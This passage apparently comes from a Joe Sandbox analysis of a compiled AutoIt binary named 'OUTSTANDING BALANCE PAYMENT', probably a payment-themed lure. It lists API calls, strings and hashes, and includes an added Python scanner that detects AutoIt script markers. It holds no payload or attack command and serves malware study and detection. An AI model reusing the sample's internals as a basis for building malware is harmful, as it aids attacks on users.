                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: 6af010fe70e6c91e97ac37c7f10e5d1153670fe4e69b4b50e4029228b70186ab
                                                                  • Instruction ID: 10965b015ef9fe64405e110c8262ee0524aa969e20ce0f8baa5204d05632d54c
                                                                  • Opcode Fuzzy Hash: 6af010fe70e6c91e97ac37c7f10e5d1153670fe4e69b4b50e4029228b70186ab
                                                                  • Instruction Fuzzy Hash: 9E026C752146019FCB15EF15C895A2AB7E5FF88720F04845DF98A9B3A2CB30ED61CF81
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 002E6C56
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002E6D16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 3974292440-719923060
                                                                  • Opcode ID: b2e5a1b910a28553db8c97199d86b40be536902f15cbd1445642f1e1d50ce76f
                                                                  • Instruction ID: 116c4ebf51cbf9e3eb30776741b35849955dec5505765ef885423689654d9ba7
                                                                  • Opcode Fuzzy Hash: b2e5a1b910a28553db8c97199d86b40be536902f15cbd1445642f1e1d50ce76f
                                                                  • Instruction Fuzzy Hash: 61A1D0342703829FCB14EF21C895A6AB3A1BF54394F54496DB8A65B3D2DB70EC29CF41
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 002BCF91
                                                                  • __swprintf.LIBCMT ref: 002BD032
                                                                  • _wcscmp.LIBCMT ref: 002BD045
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002BD09A
                                                                  • _wcscmp.LIBCMT ref: 002BD0D6
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 002BD10D
                                                                  • GetDlgCtrlID.USER32(?), ref: 002BD15F
                                                                  • GetWindowRect.USER32(?,?), ref: 002BD195
                                                                  • GetParent.USER32(?), ref: 002BD1B3
                                                                  • ScreenToClient.USER32(00000000), ref: 002BD1BA
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 002BD234
                                                                  • _wcscmp.LIBCMT ref: 002BD248
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 002BD26E
                                                                  • _wcscmp.LIBCMT ref: 002BD282
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                  • String ID: %s%u
                                                                  • API String ID: 3119225716-679674701
                                                                  • Opcode ID: 32bb1018eaff62fb8e5d83cb4cb97e4c49f0a5d496381ed7bff6ae54e72949dd
                                                                  • Instruction ID: 1e467d6f7ffbfd9285ef2423769f0a493f11768f657ab2ce5ff0ef4697e97437
                                                                  • Opcode Fuzzy Hash: 32bb1018eaff62fb8e5d83cb4cb97e4c49f0a5d496381ed7bff6ae54e72949dd
                                                                  • Instruction Fuzzy Hash: 83A1EF31624747ABD715DF64C884FEAB7A8FF04394F008A1AF99992181EB30E965CB91
                                                                  APIs
                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 002BD8EB
                                                                  • _wcscmp.LIBCMT ref: 002BD8FC
                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 002BD924
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 002BD941
                                                                  • _wcscmp.LIBCMT ref: 002BD95F
                                                                  • _wcsstr.LIBCMT ref: 002BD970
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 002BD9A8
                                                                  • _wcscmp.LIBCMT ref: 002BD9B8
                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 002BD9DF
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 002BDA28
                                                                  • _wcscmp.LIBCMT ref: 002BDA38
                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 002BDA60
                                                                  • GetWindowRect.USER32(00000004,?), ref: 002BDAC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                  • String ID: @$ThumbnailClass
                                                                  • API String ID: 1788623398-1539354611
                                                                  • Opcode ID: f502e5eb99e413b2084b65fc8bc40779ceed09cf886b4491b1a220a09f800505
                                                                  • Instruction ID: 212315f0a9511d7398d5afd8cf19dea3006e7120038364d270f357b5092ea8c4
                                                                  • Opcode Fuzzy Hash: f502e5eb99e413b2084b65fc8bc40779ceed09cf886b4491b1a220a09f800505
                                                                  • Instruction Fuzzy Hash: 9081C6310183069BDB05DF50C885FEA7BE8FF44798F18446AFD899A096EB30DD65CBA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                  • API String ID: 1038674560-1810252412
                                                                  • Opcode ID: 68ef60b1821072a21e887f0e2754fd5a9d50a4626b80c9ccc04efa1b0ed32e7c
                                                                  • Instruction ID: 1eb9c56ac5706bcd4b82924e27a46cdee9d01c2b5d2cd1a754ed3dc06f3a108f
                                                                  • Opcode Fuzzy Hash: 68ef60b1821072a21e887f0e2754fd5a9d50a4626b80c9ccc04efa1b0ed32e7c
                                                                  • Instruction Fuzzy Hash: 4C31BE35A64205AADB15FE60DE93EEEB3A59F20795F300129F441B10E1FF61AE34CB11
                                                                  APIs
                                                                  • LoadIconW.USER32(00000063), ref: 002BEAB0
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002BEAC2
                                                                  • SetWindowTextW.USER32(?,?), ref: 002BEAD9
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 002BEAEE
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 002BEAF4
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 002BEB04
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 002BEB0A
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002BEB2B
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002BEB45
                                                                  • GetWindowRect.USER32(?,?), ref: 002BEB4E
                                                                  • SetWindowTextW.USER32(?,?), ref: 002BEBB9
                                                                  • GetDesktopWindow.USER32 ref: 002BEBBF
                                                                  • GetWindowRect.USER32(00000000), ref: 002BEBC6
                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002BEC12
                                                                  • GetClientRect.USER32(?,?), ref: 002BEC1F
                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002BEC44
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002BEC6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: 8807671f77793e2b5322e5e39eabff7f353aa7a7444c304c1192d7ea108a065c
                                                                  • Instruction ID: cd741a64b6f150b50f3a222ed6695e498bffb0494a18ea755f4f7c20b05088f7
                                                                  • Opcode Fuzzy Hash: 8807671f77793e2b5322e5e39eabff7f353aa7a7444c304c1192d7ea108a065c
                                                                  • Instruction Fuzzy Hash: 58516F7190070AEFDB219FA8CD89BAEBBF9FF04744F014919E596A25A0C775A954CF00
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 002D79C6
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 002D79D1
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 002D79DC
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 002D79E7
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 002D79F2
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 002D79FD
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 002D7A08
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 002D7A13
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 002D7A1E
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 002D7A29
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 002D7A34
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 002D7A3F
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 002D7A4A
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 002D7A55
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 002D7A60
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 002D7A6B
                                                                  • GetCursorInfo.USER32(?), ref: 002D7A7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$Info
                                                                  • String ID:
                                                                  • API String ID: 2577412497-0
                                                                  • Opcode ID: d1e99d5b00e181e57e3997654d1e4a5c9635adbaa5e118ee54dc22f45876d359
                                                                  • Instruction ID: 25640820835c366e1e85a5e65d532ae870e4482bb6f955a940305a454fae027a
                                                                  • Opcode Fuzzy Hash: d1e99d5b00e181e57e3997654d1e4a5c9635adbaa5e118ee54dc22f45876d359
                                                                  • Instruction Fuzzy Hash: DA31E7B1D5831A6ADB509FB68C8995FBFE8FF04750F504527A50DE7280EA78A9008F91
                                                                  APIs
                                                                    • Part of subcall function 0029E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0028C8B7,?,00002000,?,?,00000000,?,0028419E,?,?,?,0031DC00), ref: 0029E984
                                                                    • Part of subcall function 0028660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002853B1,?,?,002861FF,?,00000000,00000001,00000000), ref: 0028662F
                                                                  • __wsplitpath.LIBCMT ref: 0028C93E
                                                                    • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
                                                                  • _wcscpy.LIBCMT ref: 0028C953
                                                                  • _wcscat.LIBCMT ref: 0028C968
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0028C978
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0028CABE
                                                                    • Part of subcall function 0028B337: _wcscpy.LIBCMT ref: 0028B36F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 2258743419-1018226102
                                                                  • Opcode ID: 70682b725bbab066a1bca7f92d7a07026917d8f5cecf70706cf61d6fceb470d8
                                                                  • Instruction ID: 76cd93d6de4d42be3d6a4e591763f7692a75bf27cdaf75f61a7fadfc77656971
                                                                  • Opcode Fuzzy Hash: 70682b725bbab066a1bca7f92d7a07026917d8f5cecf70706cf61d6fceb470d8
                                                                  • Instruction Fuzzy Hash: 2212E2754283419FC724EF24C881AAFBBE4BF89354F50492EF58993291DB30DA69CF52
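The function above is the AutoIt runtime's script loader: its string references carry the compiled-script tag "AU3!" / "EA06", the older ">>>AUTOIT SCRIPT<<<" marker and the loader's own parse-error messages, which is the evidence behind the "Binary is likely a compiled AutoIt script file" signature. As an added example that is not part of the Joe Sandbox report, the following Python check scans a file image for those same markers. It assumes the ASCII tag appears contiguously as "AU3!EA06" (the usual form matched by AutoIt YARA rules); the sample image in the block is constructed for the demonstration and is not data from the analysed sample.

```python
"""Scan a file image for the compiled-AutoIt markers referenced by the loader above.

Added example, not part of the Joe Sandbox report. The byte markers come from
the String ID of the script-loader function; the sample image at the bottom is
constructed for the demo.
"""
import re
import sys

# Markers recovered from the string references of the loader function.
AU3_MAGIC = b"AU3!EA06"                 # tag of an AutoIt3 compiled script (assumed contiguous)
AU3_LEGACY_TAG = b">>>AUTOIT SCRIPT<<<"  # older marker for a script appended to the EXE
# Error strings the loader emits on a malformed script. Every AutoIt-built
# binary embeds the runtime, so these only say "AutoIt runtime present".
LOADER_ERRORS = (
    b"#include depth exceeded",
    b"Bad directive syntax error",
    b"Unterminated string",
    b"Error opening the file",
)


def find_autoit_markers(data: bytes) -> dict:
    """Return the offsets of every marker found in `data`, plus which
    loader error strings are present."""
    return {
        "au3_magic": [m.start() for m in re.finditer(re.escape(AU3_MAGIC), data)],
        "legacy_tag": [m.start() for m in re.finditer(re.escape(AU3_LEGACY_TAG), data)],
        "loader_strings": sorted(s.decode() for s in LOADER_ERRORS if s in data),
    }


def is_likely_compiled_autoit(data: bytes) -> bool:
    """Strong signal only: the AU3!EA06 tag or the legacy script tag.
    Loader error strings alone are not enough (see LOADER_ERRORS)."""
    hits = find_autoit_markers(data)
    return bool(hits["au3_magic"] or hits["legacy_tag"])


def scan_file(path: str) -> dict:
    """Read `path` fully and report marker hits; the whole image is searched
    because the script resource may sit in an overlay or resource section."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = find_autoit_markers(data)
    hits["verdict"] = "compiled AutoIt script" if is_likely_compiled_autoit(data) else "no script tag"
    return hits


# Constructed sample image: a PE-like prefix with the AU3 tag at offset 100
# and one loader error string. Not data from the analysed sample.
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 32
    + AU3_MAGIC + b"Unterminated string\x00"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(scan_file(sys.argv[1]))
    else:
        print(find_autoit_markers(SAMPLE_IMAGE), is_likely_compiled_autoit(SAMPLE_IMAGE))
```

Run it against a suspect file with `python scan.py <file>`; a hit on the tag is the point at which to hand the binary to an AutoIt decompiler, while a file that only carries the loader strings is an AutoIt runtime without a recoverable script tag in plain form.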
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002ECEFB
                                                                  • DestroyWindow.USER32(?,?), ref: 002ECF73
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002ECFF4
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002ED016
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002ED025
                                                                  • DestroyWindow.USER32(?), ref: 002ED042
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00280000,00000000), ref: 002ED075
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002ED094
                                                                  • GetDesktopWindow.USER32 ref: 002ED0A9
                                                                  • GetWindowRect.USER32(00000000), ref: 002ED0B0
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002ED0C2
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002ED0DA
                                                                    • Part of subcall function 0029B526: GetWindowLongW.USER32(?,000000EB), ref: 0029B537
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 3877571568-3619404913
                                                                  • Opcode ID: 3b09ed6715f730dde2a59fb67eee987202e7f0796c1948071a3aa3c82496b065
                                                                  • Instruction ID: 500702040e1a4a8d170797206fa96b1bfe4b0eda92f09dbdbb31fafef8a37866
                                                                  • Opcode Fuzzy Hash: 3b09ed6715f730dde2a59fb67eee987202e7f0796c1948071a3aa3c82496b065
                                                                  • Instruction Fuzzy Hash: B271E1741A0345AFDB25CF28CC84F6677E9EB89704F88451DFD858B2A1DB74E852CB12
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 002EF37A
                                                                    • Part of subcall function 002ED7DE: ClientToScreen.USER32(?,?), ref: 002ED807
                                                                    • Part of subcall function 002ED7DE: GetWindowRect.USER32(?,?), ref: 002ED87D
                                                                    • Part of subcall function 002ED7DE: PtInRect.USER32(?,?,002EED5A), ref: 002ED88D
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002EF3E3
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002EF3EE
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002EF411
                                                                  • _wcscat.LIBCMT ref: 002EF441
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002EF458
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002EF471
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 002EF488
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 002EF4AA
                                                                  • DragFinish.SHELL32(?), ref: 002EF4B1
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002EF59C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                  • API String ID: 169749273-3440237614
                                                                  • Opcode ID: 5c1115b873210f64ef07ad7893319e1c18c09a56265f9bd6d8e2a1c79a19931d
                                                                  • Instruction ID: 7c01358bda025ad03d4dd187645cbb67eb453eca7104bbdb602b729a077fd011
                                                                  • Opcode Fuzzy Hash: 5c1115b873210f64ef07ad7893319e1c18c09a56265f9bd6d8e2a1c79a19931d
                                                                  • Instruction Fuzzy Hash: 71616975109304AFC302EF60DC85D9FBBE8EF89714F400A1EF695921A1DB70EA19CB52
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000000), ref: 002CAB3D
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 002CAB46
                                                                  • VariantClear.OLEAUT32(?), ref: 002CAB52
                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002CAC40
                                                                  • __swprintf.LIBCMT ref: 002CAC70
                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 002CAC9C
                                                                  • VariantInit.OLEAUT32(?), ref: 002CAD4D
                                                                  • SysFreeString.OLEAUT32(00000016), ref: 002CADDF
                                                                  • VariantClear.OLEAUT32(?), ref: 002CAE35
                                                                  • VariantClear.OLEAUT32(?), ref: 002CAE44
                                                                  • VariantInit.OLEAUT32(00000000), ref: 002CAE80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                  • API String ID: 3730832054-3931177956
                                                                  • Opcode ID: 3fd264b1894e6a64a5e2811d84c7ad8de7ef33f8281a0b8766204e5f27dab0d3
                                                                  • Instruction ID: 1c7a72d0dde4beef9e2b390b8aceafdfaacc65a9db35b5de3e0f9d72d7a5843f
                                                                  • Opcode Fuzzy Hash: 3fd264b1894e6a64a5e2811d84c7ad8de7ef33f8281a0b8766204e5f27dab0d3
                                                                  • Instruction Fuzzy Hash: 9DD1E37162021ADBCB149F69D885F6EB7B5FF04708F14865EF4059B181DBB0EC60DBA2
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 002E71FC
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002E7247
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: 028a7950396cc449623d51768079ca88aa9b71687a6fc3314316ff19333e3644
                                                                  • Instruction ID: e24ddf9e60e226df3611a95053cc3d969dd8f866c7a005f32f3d7d3ece92d05f
                                                                  • Opcode Fuzzy Hash: 028a7950396cc449623d51768079ca88aa9b71687a6fc3314316ff19333e3644
                                                                  • Instruction Fuzzy Hash: AC918E342247419BCB05EF20C851A6EB7A5BF94300F544899F8966B3E3DB70ED6ADF81
                                                                  APIs
